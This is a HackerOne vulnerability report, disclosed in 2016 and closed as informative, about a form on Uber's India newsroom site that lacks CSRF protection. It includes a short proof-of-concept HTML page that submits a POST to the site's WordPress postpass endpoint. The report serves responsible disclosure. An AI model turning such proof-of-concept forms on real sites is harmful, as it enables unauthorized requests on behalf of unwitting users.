Newsroom.uber HTML form without CSRF protection

Disclosed: 2016-07-07 23:19:42 By mefkan To uber
Unknown
Vulnerability Details
Hi, The link that exists CSRF vulnerability https://newsroom.uber.com/india/how-to-refer/ Attack details Form name: Empty Form action: https://newsroom.uber.com/india/wp-login.php?action=postpass&wpe-login=ubernewblog Form method: POST Reproduction Steps 1-Create a file named submit.html 2-Write this code to file <html> <body> <form action="https://newsroom.uber.com/india/wp-login.php?action=postpass&wpe-login=ubernewblog" method="POST"> <input type="hidden" name="post&#95;password" value="xxxxxxx" /> <input type="hidden" name="Submit" value="Enter" /> <input type="submit" value="Submit request" /> </form> </body> </html> 3-Then open the file with a browser click the Submit request button NOTE: It is an example so I didn't use a real value as you can see I used xxxxx you can change it to numbers. I added the submit.html file to attachments. Best regards...
Actions
View on HackerOne
Report Stats
  • Report ID: 144147
  • State: Closed
  • Substate: informative
  • Upvotes: 3
Share this report